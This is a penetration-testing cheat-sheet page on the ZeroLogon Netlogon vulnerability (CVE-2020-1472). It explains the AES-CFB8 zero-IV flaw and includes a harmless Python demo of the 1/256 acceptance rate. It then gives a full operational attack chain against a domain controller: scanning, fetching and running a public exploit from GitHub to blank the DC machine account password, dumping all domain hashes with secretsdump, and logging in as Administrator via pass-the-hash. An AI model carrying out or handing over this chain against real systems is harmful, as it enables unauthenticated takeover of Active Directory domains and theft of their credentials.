ZeroLogon - CVE-2020-1472

ZeroLogon abuses MS-NRPC (Microsoft Netlogon Remote Protocol), the Active Directory component that authenticates user and machine accounts and maintains the secure channel between domain members and domain controllers. The root cause is a cryptographic implementation flaw: the Netlogon credential is computed with AES-CFB8 using a fixed all-zero IV, so for roughly 1 session key in 256 an all-zero client challenge produces an all-zero credential. An unauthenticated attacker who can reach the DC simply repeats NetrServerAuthenticate3 with a zero challenge and zero credential until one attempt is accepted, negotiates a session without signing and sealing, and calls NetrServerPasswordSet2 to set the domain controller's own machine account password to empty. With that account the whole directory can be replicated via DRSUAPI.

  • Release date: August 2020 (Microsoft patch); public write-up and exploit September 2020

  • Impact: Elevation of Privilege (unauthenticated network access to a DC leads to Domain Admin)

  • CVSS score: 10.0 (Critical)
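The cryptographic flaw described above, as an added example (not code from this page or from dirkjanm's exploit): it reproduces the ComputeNetlogonCredential construction (AES-CFB8 with the IV hard-coded to zero) in Python and measures how often an all-zero client challenge encrypts to an all-zero credential. It uses AES-128 from the `cryptography` package when that is installed and otherwise a constructed keyed SHA-256 stand-in block function (an assumption, labelled in the code); the 1/256 property depends only on the CFB8 mode with a zero IV, not on the block cipher.

```python
"""AES-CFB8 with an all-zero IV: why an all-zero Netlogon challenge is accepted.

Added example, not code from the page or from dirkjanm's exploit.  It models
MS-NRPC's ComputeNetlogonCredential (AES variant):
    credential = AES-128-CFB8(key=session_key, iv=0x00 * 16, plaintext=challenge)
and shows that for roughly 1 session key in 256 an 8-byte all-zero challenge
encrypts to an 8-byte all-zero credential, which is exactly the guess the
exploit sends in NetrServerAuthenticate3 until the DC accepts it.
"""
import hashlib

BLOCK = 16

try:
    # Real AES-128 when the optional 'cryptography' package is present (assumption).
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def block_encrypt(key: bytes, block: bytes) -> bytes:
        enc = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
        return enc.update(block) + enc.finalize()

    CIPHER_NAME = "AES-128"
except ImportError:
    # Constructed stand-in: keyed SHA-256 truncated to one block.  It is not AES,
    # but CFB8's weakness depends only on the mode and the fixed IV, not on the
    # block function, so the measured rate is the same.
    def block_encrypt(key: bytes, block: bytes) -> bytes:
        return hashlib.sha256(key + block).digest()[:BLOCK]

    CIPHER_NAME = "sha256-stand-in"


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB mode with an 8-bit feedback register, processed byte by byte.

    Each ciphertext byte is plaintext XOR the first byte of E(key, register);
    the register then shifts left one byte and takes in the ciphertext byte.
    """
    register = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        keystream = block_encrypt(key, bytes(register))[0]
        c = p ^ keystream
        out.append(c)
        register = register[1:] + bytes([c])
    return bytes(out)


def compute_netlogon_credential(challenge: bytes, session_key: bytes) -> bytes:
    """ComputeNetlogonCredential, AES flavour: the IV is hard-coded to all zeros."""
    return cfb8_encrypt(session_key, bytes(BLOCK), challenge)


def zero_challenge_accepted(session_key: bytes) -> bool:
    """True when the attacker's guess (challenge = 0, credential = 0) is valid.

    With a zero register and a zero plaintext byte, c0 = E(key, 0)[0].  If c0 is
    zero the register stays all zeros, so every later byte is again E(key, 0)[0]
    and the whole credential is zero.  The session key is derived from the DC's
    machine-account secret plus both challenges, so each NetrServerAuthenticate3
    attempt rolls a fresh key and the attacker simply retries.
    """
    return compute_netlogon_credential(bytes(8), session_key) == bytes(8)


def first_byte_is_zero(session_key: bytes) -> bool:
    """The only condition that matters: first byte of E(key, 0^16) == 0."""
    return block_encrypt(session_key, bytes(BLOCK))[0] == 0


def sample_session_key(i: int, seed: bytes = b"constructed-zerologon-demo") -> bytes:
    """Deterministic pseudo-random 16-byte keys so the measurement is reproducible."""
    return hashlib.sha256(seed + i.to_bytes(4, "big")).digest()[:BLOCK]


def acceptance_rate(trials: int) -> float:
    """Fraction of session keys for which the all-zero guess is accepted (about 1/256)."""
    hits = sum(zero_challenge_accepted(sample_session_key(i)) for i in range(trials))
    return hits / trials


if __name__ == "__main__":
    rate = acceptance_rate(25600)
    print(f"block function: {CIPHER_NAME}")
    print(f"all-zero challenge accepted for {rate:.4%} of keys (1/256 = {1/256:.4%})")
```

Run it as a script to see the measured rate; the exploit script on this page is doing the same experiment against a live DC, one NetrServerAuthenticate3 call per trial, which is why it needs a few hundred attempts on average and caps out at 2000.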


# scan - the NetExec module fires zero-challenge NetrServerAuthenticate3 calls at the DC;
# it needs no valid credentials, so -u '' -p '' works as well
nxc smb $dc_ip -u $user -p $password -M zerologon

# exploit - sets the DC machine account password to empty; each attempt succeeds with
# probability ~1/256, so the script retries up to 2000 times
git clone https://github.com/dirkjanm/CVE-2020-1472.git
cd CVE-2020-1472/
python3 cve-2020-1472-exploit.py $dc_netbios_name $dc_ip

# dump the domain through DRSUAPI replication as the DC machine account (now an empty password;
# the backslash keeps the literal $ of the machine account name out of shell expansion)
secretsdump.py -just-dc -no-pass $dc_netbios_name\$@$dc_ip
# extract the Administrator hash from the output (LM:NT format)

# connect - psexec.py takes the LM:NT pair, evil-winrm takes the NT hash only
psexec.py Administrator:@$dc_ip -hashes $hash_admin
evil-winrm -i $dc_ip -u Administrator -H $NTLM_hash

# caveat: the empty machine account password breaks the DC's own secure channel and
# replication. Restore the original password before leaving: run secretsdump.py against the
# DC with the Administrator hash and without -just-dc to read the $MACHINE.ACC
# plain_password_hex from the LSA secrets, then feed it to restorepassword.py from the same repo.
